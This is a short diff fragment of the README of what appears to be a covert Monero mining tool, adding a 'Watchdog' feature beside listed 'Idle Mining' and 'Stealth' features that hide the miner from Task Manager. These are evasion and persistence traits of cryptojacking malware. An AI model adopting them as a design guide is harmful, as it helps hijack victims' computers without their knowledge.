UnamSanctam/SilentXMRMiner/README.md

 * Idle Mining - Can be configured to mine with a different Max CPU when computer is idle

 * Stealth - Pauses the miner while Task Manager is open

+* Watchdog - Replaces the miner if removed and starts it if closed down

 ## Prerequisites